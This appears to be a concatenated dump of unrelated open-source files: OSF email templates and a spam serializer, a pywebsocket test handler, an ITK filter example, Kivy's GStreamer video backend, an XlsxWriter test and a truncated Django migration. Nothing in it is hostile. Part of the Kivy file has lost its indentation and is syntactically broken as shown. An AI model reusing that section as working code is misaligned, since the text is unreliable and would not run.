'confirm_prereg',
subject='OSF Account Verification, Preregistration Challenge'
)
CONFIRM_EMAIL_ERPC = Mail(
'confirm_erpc',
subject='OSF Account Verification, Election Research Preacceptance Competition'
)
def CONFIRM_EMAIL_PREPRINTS(name, provider):
    """Account-verification Mail for a preprint provider's sign-up campaign.
    (PEP 8 E731: named def instead of an assigned lambda.)"""
    return Mail(
        'confirm_preprints_{}'.format(name),
        subject='OSF Account Verification, {}'.format(provider)
    )
CONFIRM_EMAIL_REGISTRIES_OSF = Mail(
'confirm_registries_osf',
subject='OSF Account Verification, OSF Registries'
)
def CONFIRM_EMAIL_MODERATION(provider):
    """Account-verification Mail for a moderation provider.
    (PEP 8 E731: named def instead of an assigned lambda.)"""
    return Mail(
        'confirm_moderation',
        subject='OSF Account Verification, {}'.format(provider.name)
    )
# Merge account, add or remove email confirmation emails.
CONFIRM_MERGE = Mail('confirm_merge', subject='Confirm account merge')
PRIMARY_EMAIL_CHANGED = Mail('primary_email_changed', subject='Primary email changed')
# Contributor added confirmation emails
INVITE_DEFAULT = Mail(
'invite_default',
subject='You have been added as a contributor to an OSF project.'
)
def INVITE_PREPRINT(template, provider):
    """Contributor-invite Mail for a preprint provider.
    (PEP 8 E731: named def instead of an assigned lambda.)"""
    return Mail(
        'invite_preprints_{}'.format(template),
        subject='You have been added as a contributor to {} {} {}.'.format(get_english_article(provider.name), provider.name, provider.preprint_word)
    )
CONTRIBUTOR_ADDED_DEFAULT = Mail(
'contributor_added_default',
subject='You have been added as a contributor to an OSF project.'
)
def CONTRIBUTOR_ADDED_PREPRINT(template, provider):
    """Contributor-added Mail for a preprint provider.
    (PEP 8 E731: named def instead of an assigned lambda.)"""
    return Mail(
        'contributor_added_preprints_{}'.format(template),
        subject='You have been added as a contributor to {} {} {}.'.format(get_english_article(provider.name), provider.name, provider.preprint_word)
    )
CONTRIBUTOR_ADDED_PREPRINT_NODE_FROM_OSF = Mail(
'contributor_added_preprint_node_from_osf',
subject='You have been added as a contributor to an OSF project.'
)
def MODERATOR_ADDED(provider):
    """Moderator-added Mail for a provider.
    (PEP 8 E731: named def instead of an assigned lambda.)"""
    return Mail(
        'moderator_added',
        subject='You have been added as a moderator for {}'.format(provider.name)
    )
CONTRIBUTOR_ADDED_ACCESS_REQUEST = Mail(
'contributor_added_access_request',
subject='Your access request to an OSF project has been approved'
)
FORWARD_INVITE = Mail('forward_invite', subject='Please forward to ${fullname}')
FORWARD_INVITE_REGISTERED = Mail('forward_invite_registered', subject='Please forward to ${fullname}')
FORGOT_PASSWORD = Mail('forgot_password', subject='Reset Password')
PASSWORD_RESET = Mail('password_reset', subject='Your OSF password has been reset')
PENDING_VERIFICATION = Mail('pending_invite', subject='Your account is almost ready!')
PENDING_VERIFICATION_REGISTERED = Mail('pending_registered', subject='Received request to be a contributor')
REQUEST_EXPORT = Mail('support_request', subject='[via OSF] Export Request')
REQUEST_DEACTIVATION = Mail('support_request', subject='[via OSF] Deactivation Request')
SPAM_USER_BANNED = Mail('spam_user_banned', subject='[OSF] Account flagged as spam')
CONFERENCE_SUBMITTED = Mail(
'conference_submitted',
subject='Project created on OSF',
)
CONFERENCE_INACTIVE = Mail(
'conference_inactive',
subject='OSF Error: Conference inactive',
)
CONFERENCE_FAILED = Mail(
'conference_failed',
subject='OSF Error: No files attached',
)
DIGEST = Mail(
'digest', subject='OSF Notifications',
categories=['notifications', 'notifications-digest']
)
DIGEST_REVIEWS_MODERATORS = Mail(
'digest_reviews_moderators',
subject='Recent submissions to ${provider_name}',
)
TRANSACTIONAL = Mail(
'transactional', subject='OSF: ${subject}',
categories=['notifications', 'notifications-transactional']
)
# Retraction related Mail objects
PENDING_RETRACTION_ADMIN = Mail(
'pending_retraction_admin',
subject='Withdrawal pending for one of your projects.'
)
PENDING_RETRACTION_NON_ADMIN = Mail(
'pending_retraction_non_admin',
subject='Withdrawal pending for one of your projects.'
)
# Embargo related Mail objects
PENDING_EMBARGO_ADMIN = Mail(
'pending_embargo_admin',
subject='Registration pending for one of your projects.'
)
PENDING_EMBARGO_NON_ADMIN = Mail(
'pending_embargo_non_admin',
subject='Registration pending for one of your projects.'
)
# Registration related Mail Objects
PENDING_REGISTRATION_ADMIN = Mail(
'pending_registration_admin',
subject='Registration pending for one of your projects.'
)
PENDING_REGISTRATION_NON_ADMIN = Mail(
'pending_registration_non_admin',
subject='Registration pending for one of your projects.'
)
PENDING_EMBARGO_TERMINATION_ADMIN = Mail(
'pending_embargo_termination_admin',
subject='Request to end an embargo early for one of your projects.'
)
PENDING_EMBARGO_TERMINATION_NON_ADMIN = Mail(
'pending_embargo_termination_non_admin',
subject='Request to end an embargo early for one of your projects.'
)
FILE_OPERATION_SUCCESS = Mail(
'file_operation_success',
subject='Your ${action} has finished',
)
FILE_OPERATION_FAILED = Mail(
'file_operation_failed',
subject='Your ${action} has failed',
)
UNESCAPE = '<% from osf.utils.sanitize import unescape_entities %> ${unescape_entities(src.title)}'
PROBLEM_REGISTERING = 'Problem registering ' + UNESCAPE
ARCHIVE_SIZE_EXCEEDED_DESK = Mail(
'archive_size_exceeded_desk',
subject=PROBLEM_REGISTERING
)
ARCHIVE_SIZE_EXCEEDED_USER = Mail(
'archive_size_exceeded_user',
subject=PROBLEM_REGISTERING
)
ARCHIVE_COPY_ERROR_DESK = Mail(
'archive_copy_error_desk',
subject=PROBLEM_REGISTERING
)
ARCHIVE_COPY_ERROR_USER = Mail(
'archive_copy_error_user',
subject=PROBLEM_REGISTERING
)
ARCHIVE_FILE_NOT_FOUND_DESK = Mail(
'archive_file_not_found_desk',
subject=PROBLEM_REGISTERING
)
ARCHIVE_FILE_NOT_FOUND_USER = Mail(
'archive_file_not_found_user',
subject='Registration failed because of altered files'
)
ARCHIVE_UNCAUGHT_ERROR_DESK = Mail(
'archive_uncaught_error_desk',
subject=PROBLEM_REGISTERING
)
ARCHIVE_REGISTRATION_STUCK_DESK = Mail(
'archive_registration_stuck_desk',
subject='[auto] Stuck registrations audit'
)
ARCHIVE_UNCAUGHT_ERROR_USER = Mail(
'archive_uncaught_error_user',
subject=PROBLEM_REGISTERING
)
ARCHIVE_SUCCESS = Mail(
'archive_success',
subject='Registration of ' + UNESCAPE + ' complete'
)
WELCOME = Mail(
'welcome',
subject='Welcome to OSF',
engagement=True
)
WELCOME_OSF4I = Mail(
'welcome_osf4i',
subject='Welcome to OSF',
engagement=True
)
PREREG_CHALLENGE_REJECTED = Mail(
'prereg_challenge_rejected',
subject='Revisions required, your submission for the Preregistration Challenge is not yet registered'
)
PREREG_CHALLENGE_ACCEPTED = Mail(
'prereg_challenge_accepted',
subject='Your research plan has been registered and accepted for the Preregistration Challenge'
)
PREREG_CSV = Mail(
'prereg_csv',
subject='[auto] Updated Prereg CSV'
)
EMPTY = Mail('empty', subject='${subject}')
SHARE_ERROR_DESK = Mail(
'send_data_share_error_desk',
subject='Share Error'
)
SHARE_PREPRINT_ERROR_DESK = Mail(
'send_data_share_preprint_error_desk',
subject='Share Error'
)
REVIEWS_SUBMISSION_CONFIRMATION = Mail(
'reviews_submission_confirmation',
subject='Confirmation of your submission to ${provider_name}'
)
ACCESS_REQUEST_SUBMITTED = Mail(
'access_request_submitted',
subject='An OSF user has requested access to your ${node.project_or_component}'
)
ACCESS_REQUEST_DENIED = Mail(
'access_request_rejected',
subject='Your access request to an OSF project has been declined'
)
CROSSREF_ERROR = Mail(
'crossref_doi_error',
subject='There was an error creating a DOI for preprint(s). batch_id: ${batch_id}'
)
PREPRINT_WITHDRAWAL_REQUEST_GRANTED = Mail(
'preprint_withdrawal_request_granted',
subject='Your ${reviewable.provider.preprint_word} has been withdrawn',
)
| apache-2.0 |
tyagiarpit/servo | tests/wpt/web-platform-tests/tools/pywebsocket/src/test/testdata/handlers/abort_by_user_wsh.py | 496 | 1798 | # Copyright 2011, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from mod_pywebsocket import handshake
def web_socket_do_extra_handshake(request):
    # Deliberately abort during the opening handshake so the test suite can
    # exercise AbortedByUserException handling.
    raise handshake.AbortedByUserException("abort for test")
def web_socket_transfer_data(request):
    """Deliberately abort during the data-transfer phase (test fixture for
    AbortedByUserException handling in the server)."""
    error = handshake.AbortedByUserException("abort for test")
    raise error
# vi:sts=4 sw=4 et
| mpl-2.0 |
CIBC-Internal/itk | Wrapping/Generators/Python/Tests/MeanImageFilter.py | 19 | 1167 | #==========================================================================
#
# Copyright Insight Software Consortium
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0.txt
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#==========================================================================*/
#
# Example on the use of the MeanImageFilter
#
import itk
from sys import argv
import ast

# Pipeline works on 2-D, 8-bit unsigned-char images.
dim = 2
IType = itk.Image[itk.UC, dim]

# Read input image given as the first command-line argument.
reader = itk.ImageFileReader[IType].New(FileName=argv[1])

# Renamed from 'filter' so the Python builtin is not shadowed.
# ast.literal_eval replaces eval(): it still accepts literal radii such as
# "3" or "(3, 3)" from the command line, but cannot execute arbitrary code.
mean_filter = itk.MeanImageFilter[IType, IType].New(
    reader, Radius=ast.literal_eval(argv[3]))
watcher = itk.SimpleFilterWatcher(mean_filter, "filter")

# Write the filtered image to the path given as the second argument.
writer = itk.ImageFileWriter[IType].New(mean_filter, FileName=argv[2])
writer.Update()
| apache-2.0 |
TomBaxter/osf.io | admin/spam/serializers.py | 9 | 1212 | from website.settings import DOMAIN as OSF_DOMAIN
from website.settings import OSF_SUPPORT_EMAIL
from osf.models import OSFUser
from furl import furl
def serialize_comment(comment):
    """Build a plain dict representation of a comment for the spam admin UI.

    NOTE(review): ``comment.reports`` appears to be a dict mapping the
    reporting user to the report payload — confirm against the Comment model.
    """
    # dict.items() works on both Python 2 and 3; .iteritems() is Python 2 only
    # and breaks under Python 3.
    reports = [
        serialize_report(user, report)
        for user, report in comment.reports.items()
    ]
    author_abs_url = furl(OSF_DOMAIN)
    author_abs_url.path.add(comment.user.url)

    return {
        'id': comment._id,
        'author': OSFUser.load(comment.user._id),
        'author_id': comment.user._id,
        'author_path': author_abs_url.url,
        'date_created': comment.created,
        'date_modified': comment.modified,
        'content': comment.content,
        'has_children': bool(getattr(comment, 'commented', [])),
        'modified': comment.edited,
        'is_deleted': comment.is_deleted,
        'spam_status': comment.spam_status,
        'reports': reports,
        'node': comment.node,
        # Guard against comments with no reports; the previous code indexed
        # reports[0] unconditionally and raised IndexError on an empty list.
        'category': reports[0]['category'] if reports else None,
        'osf_support_email': OSF_SUPPORT_EMAIL,
    }
def serialize_report(user, report):
    """Return a display dict for a single spam report made by *user*."""
    reporter = OSFUser.load(user)
    return {
        'reporter': reporter,
        'category': report.get('category'),
        'reason': report.get('text'),
    }
| apache-2.0 |
koyuawsmbrtn/eclock | windows/kivy/kivy/core/video/video_gstplayer.py | 8 | 3808 | '''
Video Gstplayer
===============
.. versionadded:: 1.8.0
Implementation of a VideoBase with Kivy :class:`~kivy.lib.gstplayer.GstPlayer`
This player is the prefered player, using Gstreamer 1.0, working on both Python
2 and 3.
'''
from kivy.lib.gstplayer import GstPlayer, get_gst_version
from kivy.graphics.texture import Texture
from kivy.core.video import VideoBase
from kivy.logger import Logger
from kivy.clock import Clock
from kivy.compat import PY2
from threading import Lock
from functools import partial
from os.path import realpath
from weakref import ref
if PY2:
from urllib import pathname2url
else:
from urllib.request import pathname2url
Logger.info('VideoGstplayer: Using Gstreamer {}'.format(
'.'.join(map(str, get_gst_version()))))
def _on_gstplayer_buffer(video, width, height, data):
video = video()
# if we still receive the video but no more player, remove it.
if not video:
return
with video._buffer_lock:
video._buffer = (width, height, data)
def _on_gstplayer_message(mtype, message):
    """Forward a GStreamer bus message to the matching Kivy log level."""
    loggers = {
        'error': Logger.error,
        'warning': Logger.warning,
        'info': Logger.info,
    }
    log = loggers.get(mtype)
    if log is not None:
        log('VideoGstplayer: {}'.format(message))
class VideoGstplayer(VideoBase):
    """VideoBase backend built on kivy.lib.gstplayer (GStreamer 1.0).

    Frames are delivered on a GStreamer thread via _on_gstplayer_buffer and
    consumed on the Kivy thread in _update().
    """

    def __init__(self, **kwargs):
        # Underlying GstPlayer; created in load(), dropped in unload().
        self.player = None
        # Last frame received from GStreamer as (width, height, data).
        self._buffer = None
        # Guards _buffer: written from the GStreamer thread, read in _update.
        self._buffer_lock = Lock()
        super(VideoGstplayer, self).__init__(**kwargs)

    def _on_gst_eos_sync(self):
        # Called from the GStreamer thread; defer EOS handling to Kivy's thread.
        Clock.schedule_once(self._do_eos, 0)

    def load(self):
        """Create the GstPlayer for the current filename."""
        Logger.debug('VideoGstplayer: Load <{}>'.format(self._filename))
        uri = self._get_uri()
        # Hand only a weakref to the callback so the player object can still
        # be garbage collected while GStreamer holds the callback.
        wk_self = ref(self)
        self.player_callback = partial(_on_gstplayer_buffer, wk_self)
        self.player = GstPlayer(uri, self.player_callback,
                                self._on_gst_eos_sync, _on_gstplayer_message)
        self.player.set_volume(self.volume)
        self.player.load()

    def unload(self):
        """Tear down the player and drop any pending frame and texture."""
        if self.player:
            self.player.unload()
            self.player = None
        with self._buffer_lock:
            self._buffer = None
        self._texture = None

    def stop(self):
        super(VideoGstplayer, self).stop()
        self.player.stop()

    def pause(self):
        super(VideoGstplayer, self).pause()
        self.player.pause()

    def play(self):
        super(VideoGstplayer, self).play()
        self.player.play()

    def seek(self, percent):
        # percent is a 0-1 position fraction, as in VideoBase.seek.
        self.player.seek(percent)

    def _get_position(self):
        return self.player.get_position()

    def _get_duration(self):
        return self.player.get_duration()

    def _get_volume(self):
        return self._volume

    def _set_volume(self, value):
        self._volume = value
        # Volume may be set before load(); it is re-applied in load().
        if self.player:
            self.player.set_volume(self._volume)

    def _update(self, dt):
        """Clock callback: upload the latest pending frame, if any."""
        buf = None
        with self._buffer_lock:
            buf = self._buffer
            self._buffer = None
        if buf is not None:
            self._update_texture(buf)
            self.dispatch('on_frame')

    def _update_texture(self, buf):
        """Blit one (width, height, data) RGB frame into the texture."""
        width, height, data = buf
        # texture is not allocated yet, create it first
        if not self._texture:
            self._texture = Texture.create(size=(width, height),
                                           colorfmt='rgb')
            self._texture.flip_vertical()
            self.dispatch('on_load')
        self._texture.blit_buffer(data, size=(width, height), colorfmt='rgb')

    def _get_uri(self):
        """Return the playback URI; bare filesystem paths become file: URIs."""
        uri = self.filename
        if not uri:
            return
        if not '://' in uri:
            uri = 'file:' + pathname2url(realpath(uri))
        return uri
| gpl-2.0 |
Thhhza/XlsxWriter | xlsxwriter/test/comparison/test_chart_scatter07.py | 8 | 1897 | ###############################################################################
#
# Tests for XlsxWriter.
#
# Copyright (c), 2013-2015, John McNamara, jmcnamara@cpan.org
#
from ..excel_comparsion_test import ExcelComparisonTest
from ...workbook import Workbook
class TestCompareXLSXFiles(ExcelComparisonTest):
    """
    Compare a workbook produced by XlsxWriter against a reference file
    that was created by Excel itself.
    """

    def setUp(self):
        self.maxDiff = None

        filename = 'chart_scatter07.xlsx'
        test_dir = 'xlsxwriter/test/comparison/'
        self.got_filename = '{}_test_{}'.format(test_dir, filename)
        self.exp_filename = '{}xlsx_files/{}'.format(test_dir, filename)

        self.ignore_files = []
        self.ignore_elements = {'xl/workbook.xml': ['<fileVersion', '<calcPr']}

    def test_create_file(self):
        """Build a scatter chart with a secondary axis and compare it."""
        workbook = Workbook(self.got_filename)
        worksheet = workbook.add_worksheet()
        chart = workbook.add_chart({'type': 'scatter'})

        # Fixed axis ids so the output matches the reference file exactly.
        chart.axis_ids = [63597952, 63616128]
        chart.axis2_ids = [63617664, 63619456]

        columns = [
            [27, 33, 44, 12, 1],
            [6, 8, 6, 4, 2],
            [20, 10, 30, 50, 40],
            [0, 27, 23, 30, 40],
        ]
        for letter, values in zip('ABCD', columns):
            worksheet.write_column(letter + '1', values)

        chart.add_series({'categories': '=Sheet1!$A$1:$A$5',
                          'values': '=Sheet1!$B$1:$B$5',
                          })
        chart.add_series({'categories': '=Sheet1!$C$1:$C$5',
                          'values': '=Sheet1!$D$1:$D$5',
                          'y2_axis': 1,
                          })

        worksheet.insert_chart('E9', chart)
        workbook.close()

        self.assertExcelEqual()
| bsd-2-clause |
xylan2004/AciSnippets | tutorial/snippets/migrations/0001_initial.py | 1 | 11780 | # -*- coding: utf-8 -*-
# Generated by Django 1.10.4 on 2016-12-30 05:58
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial migration: creates the ``Snippet`` model.

    Auto-generated by Django 1.10.4 (makemigrations).  The very long
    ``language`` and ``style`` choice lists mirror the lexers and styles
    available in the installed pygments version at generation time.
    """

    # First migration of this app, so it has no same-app predecessors.
    initial = True

    dependencies = [
        # The owner FK below targets the (swappable) user model.
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]

    operations = [
        migrations.CreateModel(
            name='Snippet',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('highlighted', models.TextField()),
                ('created', models.DateTimeField(auto_now_add=True)),
                ('title', models.CharField(blank=True, default='', max_length=100)),
                ('code', models.TextField()),
                ('linenos', models.BooleanField(default=False)),
                ('language', models.CharField(choices=[('abap', 'ABAP'), ('abnf', 'ABNF'), ('ada', 'Ada'), ('adl', 'ADL'), ('agda', 'Agda'), ('ahk', 'autohotkey'), ('alloy', 'Alloy'), ('antlr', 'ANTLR'), ('antlr-as', 'ANTLR With ActionScript Target'), ('antlr-cpp', 'ANTLR With CPP Target'), ('antlr-csharp', 'ANTLR With C# Target'), ('antlr-java', 'ANTLR With Java Target'), ('antlr-objc', 'ANTLR With ObjectiveC Target'), ('antlr-perl', 'ANTLR With Perl Target'), ('antlr-python', 'ANTLR With Python Target'), ('antlr-ruby', 'ANTLR With Ruby Target'), ('apacheconf', 'ApacheConf'), ('apl', 'APL'), ('applescript', 'AppleScript'), ('arduino', 'Arduino'), ('as', 'ActionScript'), ('as3', 'ActionScript 3'), ('aspectj', 'AspectJ'), ('aspx-cs', 'aspx-cs'), ('aspx-vb', 'aspx-vb'), ('asy', 'Asymptote'), ('at', 'AmbientTalk'), ('autoit', 'AutoIt'), ('awk', 'Awk'), ('basemake', 'Base Makefile'), ('bash', 'Bash'), ('bat', 'Batchfile'), ('bbcode', 'BBCode'), ('bc', 'BC'), ('befunge', 'Befunge'), ('blitzbasic', 'BlitzBasic'), ('blitzmax', 'BlitzMax'), ('bnf', 'BNF'), ('boo', 'Boo'), ('boogie', 'Boogie'), ('brainfuck', 'Brainfuck'), ('bro', 'Bro'), ('bugs', 'BUGS'), ('c', 'C'), ('c-objdump', 'c-objdump'), ('ca65', 'ca65 assembler'), ('cadl', 'cADL'), ('camkes', 'CAmkES'), ('cbmbas', 'CBM BASIC V2'), ('ceylon', 'Ceylon'), ('cfc', 'Coldfusion CFC'), ('cfengine3', 'CFEngine3'), ('cfm', 'Coldfusion HTML'), ('cfs', 'cfstatement'), ('chai', 'ChaiScript'), ('chapel', 'Chapel'), ('cheetah', 'Cheetah'), ('cirru', 'Cirru'), ('clay', 'Clay'), ('clojure', 'Clojure'), ('clojurescript', 'ClojureScript'), ('cmake', 'CMake'), ('cobol', 'COBOL'), ('cobolfree', 'COBOLFree'), ('coffee-script', 'CoffeeScript'), ('common-lisp', 'Common Lisp'), ('componentpascal', 'Component Pascal'), ('console', 'Bash Session'), ('control', 'Debian Control file'), ('coq', 'Coq'), ('cpp', 'C++'), ('cpp-objdump', 'cpp-objdump'), ('cpsa', 'CPSA'), ('crmsh', 'Crmsh'), ('croc', 'Croc'), ('cryptol', 'Cryptol'), ('csharp', 'C#'), ('csound', 'Csound Orchestra'), ('csound-document', 'Csound Document'), ('csound-score', 'Csound Score'), ('css', 'CSS'), ('css+django', 'CSS+Django/Jinja'), ('css+erb', 'CSS+Ruby'), ('css+genshitext', 'CSS+Genshi Text'), ('css+lasso', 'CSS+Lasso'), ('css+mako', 'CSS+Mako'), ('css+mozpreproc', 'CSS+mozpreproc'), ('css+myghty', 'CSS+Myghty'), ('css+php', 'CSS+PHP'), ('css+smarty', 'CSS+Smarty'), ('cucumber', 'Gherkin'), ('cuda', 'CUDA'), ('cypher', 'Cypher'), ('cython', 'Cython'), ('d', 'D'), ('d-objdump', 'd-objdump'), ('dart', 'Dart'), ('delphi', 'Delphi'), ('dg', 'dg'), ('diff', 'Diff'), ('django', 'Django/Jinja'), ('docker', 'Docker'), ('doscon', 'MSDOS Session'), ('dpatch', 'Darcs Patch'), ('dtd', 'DTD'), ('duel', 'Duel'), ('dylan', 'Dylan'), ('dylan-console', 'Dylan session'), ('dylan-lid', 'DylanLID'), ('earl-grey', 'Earl Grey'), ('easytrieve', 'Easytrieve'), ('ebnf', 'EBNF'), ('ec', 'eC'), ('ecl', 'ECL'), ('eiffel', 'Eiffel'), ('elixir', 'Elixir'), ('elm', 'Elm'), ('emacs', 'EmacsLisp'), ('erb', 'ERB'), ('erl', 'Erlang erl session'), ('erlang', 'Erlang'), ('evoque', 'Evoque'), ('ezhil', 'Ezhil'), ('factor', 'Factor'), ('fan', 'Fantom'), ('fancy', 'Fancy'), ('felix', 'Felix'), ('fish', 'Fish'), ('fortran', 'Fortran'), ('fortranfixed', 'FortranFixed'), ('foxpro', 'FoxPro'), ('fsharp', 'FSharp'), ('gap', 'GAP'), ('gas', 'GAS'), ('genshi', 'Genshi'), ('genshitext', 'Genshi Text'), ('glsl', 'GLSL'), ('gnuplot', 'Gnuplot'), ('go', 'Go'), ('golo', 'Golo'), ('gooddata-cl', 'GoodData-CL'), ('gosu', 'Gosu'), ('groff', 'Groff'), ('groovy', 'Groovy'), ('gst', 'Gosu Template'), ('haml', 'Haml'), ('handlebars', 'Handlebars'), ('haskell', 'Haskell'), ('haxeml', 'Hxml'), ('hexdump', 'Hexdump'), ('html', 'HTML'), ('html+cheetah', 'HTML+Cheetah'), ('html+django', 'HTML+Django/Jinja'), ('html+evoque', 'HTML+Evoque'), ('html+genshi', 'HTML+Genshi'), ('html+handlebars', 'HTML+Handlebars'), ('html+lasso', 'HTML+Lasso'), ('html+mako', 'HTML+Mako'), ('html+myghty', 'HTML+Myghty'), ('html+php', 'HTML+PHP'), ('html+smarty', 'HTML+Smarty'), ('html+twig', 'HTML+Twig'), ('html+velocity', 'HTML+Velocity'), ('http', 'HTTP'), ('hx', 'Haxe'), ('hybris', 'Hybris'), ('hylang', 'Hy'), ('i6t', 'Inform 6 template'), ('idl', 'IDL'), ('idris', 'Idris'), ('iex', 'Elixir iex session'), ('igor', 'Igor'), ('inform6', 'Inform 6'), ('inform7', 'Inform 7'), ('ini', 'INI'), ('io', 'Io'), ('ioke', 'Ioke'), ('irc', 'IRC logs'), ('isabelle', 'Isabelle'), ('j', 'J'), ('jade', 'Jade'), ('jags', 'JAGS'), ('jasmin', 'Jasmin'), ('java', 'Java'), ('javascript+mozpreproc', 'Javascript+mozpreproc'), ('jcl', 'JCL'), ('jlcon', 'Julia console'), ('js', 'JavaScript'), ('js+cheetah', 'JavaScript+Cheetah'), ('js+django', 'JavaScript+Django/Jinja'), ('js+erb', 'JavaScript+Ruby'), ('js+genshitext', 'JavaScript+Genshi Text'), ('js+lasso', 'JavaScript+Lasso'), ('js+mako', 'JavaScript+Mako'), ('js+myghty', 'JavaScript+Myghty'), ('js+php', 'JavaScript+PHP'), ('js+smarty', 'JavaScript+Smarty'), ('json', 'JSON'), ('jsonld', 'JSON-LD'), ('jsp', 'Java Server Page'), ('julia', 'Julia'), ('kal', 'Kal'), ('kconfig', 'Kconfig'), ('koka', 'Koka'), ('kotlin', 'Kotlin'), ('lagda', 'Literate Agda'), ('lasso', 'Lasso'), ('lcry', 'Literate Cryptol'), ('lean', 'Lean'), ('less', 'LessCss'), ('lhs', 'Literate Haskell'), ('lidr', 'Literate Idris'), ('lighty', 'Lighttpd configuration file'), ('limbo', 'Limbo'), ('liquid', 'liquid'), ('live-script', 'LiveScript'), ('llvm', 'LLVM'), ('logos', 'Logos'), ('logtalk', 'Logtalk'), ('lsl', 'LSL'), ('lua', 'Lua'), ('make', 'Makefile'), ('mako', 'Mako'), ('maql', 'MAQL'), ('mask', 'Mask'), ('mason', 'Mason'), ('mathematica', 'Mathematica'), ('matlab', 'Matlab'), ('matlabsession', 'Matlab session'), ('minid', 'MiniD'), ('modelica', 'Modelica'), ('modula2', 'Modula-2'), ('monkey', 'Monkey'), ('moocode', 'MOOCode'), ('moon', 'MoonScript'), ('mozhashpreproc', 'mozhashpreproc'), ('mozpercentpreproc', 'mozpercentpreproc'), ('mql', 'MQL'), ('mscgen', 'Mscgen'), ('mupad', 'MuPAD'), ('mxml', 'MXML'), ('myghty', 'Myghty'), ('mysql', 'MySQL'), ('nasm', 'NASM'), ('nemerle', 'Nemerle'), ('nesc', 'nesC'), ('newlisp', 'NewLisp'), ('newspeak', 'Newspeak'), ('nginx', 'Nginx configuration file'), ('nimrod', 'Nimrod'), ('nit', 'Nit'), ('nixos', 'Nix'), ('nsis', 'NSIS'), ('numpy', 'NumPy'), ('objdump', 'objdump'), ('objdump-nasm', 'objdump-nasm'), ('objective-c', 'Objective-C'), ('objective-c++', 'Objective-C++'), ('objective-j', 'Objective-J'), ('ocaml', 'OCaml'), ('octave', 'Octave'), ('odin', 'ODIN'), ('ooc', 'Ooc'), ('opa', 'Opa'), ('openedge', 'OpenEdge ABL'), ('pacmanconf', 'PacmanConf'), ('pan', 'Pan'), ('parasail', 'ParaSail'), ('pawn', 'Pawn'), ('perl', 'Perl'), ('perl6', 'Perl6'), ('php', 'PHP'), ('pig', 'Pig'), ('pike', 'Pike'), ('pkgconfig', 'PkgConfig'), ('plpgsql', 'PL/pgSQL'), ('postgresql', 'PostgreSQL SQL dialect'), ('postscript', 'PostScript'), ('pot', 'Gettext Catalog'), ('pov', 'POVRay'), ('powershell', 'PowerShell'), ('praat', 'Praat'), ('prolog', 'Prolog'), ('properties', 'Properties'), ('protobuf', 'Protocol Buffer'), ('ps1con', 'PowerShell Session'), ('psql', 'PostgreSQL console (psql)'), ('puppet', 'Puppet'), ('py3tb', 'Python 3.0 Traceback'), ('pycon', 'Python console session'), ('pypylog', 'PyPy Log'), ('pytb', 'Python Traceback'), ('python', 'Python'), ('python3', 'Python 3'), ('qbasic', 'QBasic'), ('qml', 'QML'), ('qvto', 'QVTO'), ('racket', 'Racket'), ('ragel', 'Ragel'), ('ragel-c', 'Ragel in C Host'), ('ragel-cpp', 'Ragel in CPP Host'), ('ragel-d', 'Ragel in D Host'), ('ragel-em', 'Embedded Ragel'), ('ragel-java', 'Ragel in Java Host'), ('ragel-objc', 'Ragel in Objective C Host'), ('ragel-ruby', 'Ragel in Ruby Host'), ('raw', 'Raw token data'), ('rb', 'Ruby'), ('rbcon', 'Ruby irb session'), ('rconsole', 'RConsole'), ('rd', 'Rd'), ('rebol', 'REBOL'), ('red', 'Red'), ('redcode', 'Redcode'), ('registry', 'reg'), ('resource', 'ResourceBundle'), ('rexx', 'Rexx'), ('rhtml', 'RHTML'), ('roboconf-graph', 'Roboconf Graph'), ('roboconf-instances', 'Roboconf Instances'), ('robotframework', 'RobotFramework'), ('rql', 'RQL'), ('rsl', 'RSL'), ('rst', 'reStructuredText'), ('rts', 'TrafficScript'), ('rust', 'Rust'), ('sass', 'Sass'), ('sc', 'SuperCollider'), ('scala', 'Scala'), ('scaml', 'Scaml'), ('scheme', 'Scheme'), ('scilab', 'Scilab'), ('scss', 'SCSS'), ('shen', 'Shen'), ('slim', 'Slim'), ('smali', 'Smali'), ('smalltalk', 'Smalltalk'), ('smarty', 'Smarty'), ('sml', 'Standard ML'), ('snobol', 'Snobol'), ('sourceslist', 'Debian Sourcelist'), ('sp', 'SourcePawn'), ('sparql', 'SPARQL'), ('spec', 'RPMSpec'), ('splus', 'S'), ('sql', 'SQL'), ('sqlite3', 'sqlite3con'), ('squidconf', 'SquidConf'), ('ssp', 'Scalate Server Page'), ('stan', 'Stan'), ('swift', 'Swift'), ('swig', 'SWIG'), ('systemverilog', 